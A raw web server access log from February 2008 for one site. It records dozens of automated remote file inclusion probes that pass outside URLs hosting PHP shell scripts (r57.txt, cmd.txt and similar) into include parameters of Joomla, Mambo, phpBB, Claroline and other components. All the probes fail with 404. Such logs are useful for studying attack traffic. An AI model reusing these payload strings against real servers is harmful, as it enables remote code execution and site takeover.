209.44.101.82 - - [26/Feb/2008:07:59:41 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.91.228.154 - - [26/Feb/2008:07:59:44 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
81.91.228.154 - - [26/Feb/2008:07:59:44 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:07:59:47 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:07:59:47 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.190.1.12 - - [26/Feb/2008:08:00:07 -0800] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.190.1.12 - - [26/Feb/2008:08:00:07 -0800] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.190.1.12 - - [26/Feb/2008:08:00:07 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.190.1.12 - - [26/Feb/2008:08:00:07 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.190.1.12 - - [26/Feb/2008:08:00:07 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.190.1.12 - - [26/Feb/2008:08:00:07 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.91.228.154 - - [26/Feb/2008:08:00:16 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:08:00:18 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:08:00:19 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:08:00:19 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.119 - - [26/Feb/2008:08:01:35 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.119 - - [26/Feb/2008:08:01:35 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.119 - - [26/Feb/2008:08:01:35 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.12 - - [26/Feb/2008:08:01:36 -0800] "GET /logs/access.log//claroline/tracking/userLog.php?rootSys=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.190.1.12 - - [26/Feb/2008:08:01:36 -0800] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:08:02:15 -0800] "GET /tmp/?N=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:08:02:20 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:08:02:21 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:08:02:22 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:08:03:12 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:08:03:12 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.63.242.108 - - [26/Feb/2008:08:04:05 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://62.75.146.155/~unown/php/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.63.242.108 - - [26/Feb/2008:08:04:05 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://62.75.146.155/~unown/php/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.84.213 - - [26/Feb/2008:08:04:15 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.63.242.108 - - [26/Feb/2008:08:04:18 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://62.75.146.155/~unown/php/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.107 - - [26/Feb/2008:08:04:46 -0800] "GET /logs/access_070730.log HTTP/1.0" 200 41451 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:08:04:50 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:04:59 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:08:05:01 -0800] "GET //includes/functions_mod_user.php?phpbb_root_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:08:05:01 -0800] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.233.15.85 - - [26/Feb/2008:08:06:01 -0800] "GET /include.php?path[docroot]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.168 - - [26/Feb/2008:08:06:34 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 33494 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:08:07:39 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:08:07:53 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.69.218.144 - - [26/Feb/2008:08:08:25 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.218.144 - - [26/Feb/2008:08:08:25 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:08:09:16 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:08:09:17 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:08:09:17 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.6.221.100 - - [26/Feb/2008:08:09:55 -0800] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.221.100 - - [26/Feb/2008:08:09:55 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.21.216 - - [26/Feb/2008:08:09:59 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:08:11:22 -0800] "GET /ipblock.inc.php?path_escape=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.47.213.57 - - [26/Feb/2008:08:11:31 -0800] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.sportellogiovani.mantova.it/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.47.213.57 - - [26/Feb/2008:08:11:40 -0800] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.sportellogiovani.mantova.it/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
8.6.221.100 - - [26/Feb/2008:08:11:43 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:08:11:48 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:08:12:20 -0800] "GET /config.inc.php?path_escape=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:12:35 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:12:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:12:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:08:12:38 -0800] "GET /logs/config.inc.php?path_escape=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:08:12:57 -0800] "GET /logs/config.inc.php?path_escape=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:08:13:14 -0800] "GET /config.inc.php?path_escape=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:08:13:21 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:08:14:27 -0800] "GET /logs/access_080119.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:08:14:27 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:08:14:28 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:14:56 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [26/Feb/2008:08:15:08 -0800] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.29.89.97 - - [26/Feb/2008:08:15:08 -0800] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:08:15:54 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:08:16:44 -0800] "GET /logs/access_080119.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:08:16:44 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:08:18:10 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.21.216 - - [26/Feb/2008:08:18:53 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.216 - - [26/Feb/2008:08:18:53 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.216 - - [26/Feb/2008:08:18:54 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:08:19:08 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.251.20.27 - - [26/Feb/2008:08:19:19 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kenslabo.com/fab666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:08:19:33 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.69.218.144 - - [26/Feb/2008:08:19:38 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.218.144 - - [26/Feb/2008:08:19:38 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.218.144 - - [26/Feb/2008:08:19:38 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.218.144 - - [26/Feb/2008:08:19:39 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
80.82.118.62 - - [26/Feb/2008:08:19:41 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.63.242.108 - - [26/Feb/2008:08:19:47 -0800] "GET /logs/access_080117.log//login.php?dir=http://62.75.146.155/~unown/php/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.63.242.108 - - [26/Feb/2008:08:19:48 -0800] "GET /logs//login.php?dir=http://62.75.146.155/~unown/php/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:08:19:54 -0800] "GET /logs/access_080119.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:08:19:54 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.63.242.108 - - [26/Feb/2008:08:20:13 -0800] "GET /logs/access_080211.log//login.php?dir=http://62.75.146.155/~unown/php/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:20:36 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:20:36 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:20:36 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.222.13.22 - - [26/Feb/2008:08:20:37 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.222.13.22 - - [26/Feb/2008:08:20:37 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.222.13.22 - - [26/Feb/2008:08:20:38 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.14.74.65 - - [26/Feb/2008:08:20:50 -0800] "GET ///config.php?inc_dir=http://www.zuuniimedee.mn///modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:20:54 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:20:54 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:20:54 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.69.218.144 - - [26/Feb/2008:08:20:57 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.218.144 - - [26/Feb/2008:08:20:59 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
64.14.74.65 - - [26/Feb/2008:08:21:01 -0800] "GET /logs/access_080201.log///config.php?inc_dir=http://www.zuuniimedee.mn///modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.65 - - [26/Feb/2008:08:21:01 -0800] "GET ///config.php?inc_dir=http://www.zuuniimedee.mn///modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.65 - - [26/Feb/2008:08:21:01 -0800] "GET /logs///config.php?inc_dir=http://www.zuuniimedee.mn///modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:08:22:29 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:22:35 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:22:47 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:08:22:54 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:08:22:55 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:23:20 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:23:20 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:23:20 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.148.36 - - [26/Feb/2008:08:23:21 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kenslabo.com/fab666? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:08:24:37 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:08:24:37 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
